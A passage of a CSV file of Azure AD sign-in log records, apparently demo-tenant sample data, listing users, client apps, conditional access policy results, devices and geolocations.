83.0.478'}",5423bf62-9037-4448-bcaa-30335e461100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5423bf62-9037-4448-bcaa-30335e461100,SigninLogs,Sucess,41.90428925,-85.99833679
+1993,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:03.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f3250c13-b952-476d-b4e2-6446749c2953,Microsoft.aadiam,Microsoft.aadiam,,Message Trace Reporting,4,NL,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Exchange Online PowerShell,[],notApplied,08/04/2020 15:00,{'deviceId': ''},71693871-d407-425c-bffa-acefcfeb0e00,,,"{'countryOrRegion': 'NL', 'geoCoordinates': {'longitude': 4.940189838409424, 'latitude': 52.309051513671875}, 'state': 'Noord-Holland', 'city': 'Amsterdam'}",none,none,none,none,[],{'errorCode': 0},Message Trace Reporting,430f7f57-0d1a-4a8a-b8f5-5c5c0770ecaa,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,71693871-d407-425c-bffa-acefcfeb0e00,SigninLogs,Sucess,52.30905151,4.940189838
+1994,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:46.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,635cf915-ad83-42bf-8907-e1d238a230d8,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",37105d23-9607-4aeb-a84b-5fa362201200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,37105d23-9607-4aeb-a84b-5fa362201200,SigninLogs,Sucess,50.6406517,5.572050095
+1995,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:54.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a78c57a1-79d1-484e-b41e-17bb2a8449e3,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",37105d23-9607-4aeb-a84b-5fa3ef211200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,37105d23-9607-4aeb-a84b-5fa3ef211200,SigninLogs,Sucess,50.6406517,5.572050095
+1996,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:35.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,207e4bb7-2b2b-43e3-a1a2-ce42acd69911,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",58101571-c323-4e3c-9694-0b124e201200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,58101571-c323-4e3c-9694-0b124e201200,SigninLogs,Sucess,38.73078156,-78.17196655
+1997,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:26.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,02e7351d-8e95-4d90-a971-fa054fa3cbe3,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:04,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c95450b3-582d-4306-9dd2-9bda8c221200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,c95450b3-582d-4306-9dd2-9bda8c221200,SigninLogs,Sucess,33.7984581,-84.38828278
+1998,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a5e416c8-0072-4b38-8efc-34a8b92520fb,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",1f656d90-8802-4e53-aa2e-7546e92c1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,1f656d90-8802-4e53-aa2e-7546e92c1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1999,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:22.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6e7d6438-c723-4a07-8639-2d6c773df078,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Yammer,00000005-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",7ad10e9e-8b94-4b07-9307-1c3215ab1100,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Yammer,7ad10e9e-8b94-4b07-9307-1c3215ab1100,SigninLogs,Sucess,50.6406517,5.572050095
+2000,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:31.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2f4451f6-4610-4919-b3aa-3477164d38fb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",368167e5-753b-476f-b20c-ef0208441000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,368167e5-753b-476f-b20c-ef0208441000,SigninLogs,Sucess,41.90428925,-85.99833679
+2001,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:14.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,abc8469f-7091-0000-54b3-302772a2dcfb,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, 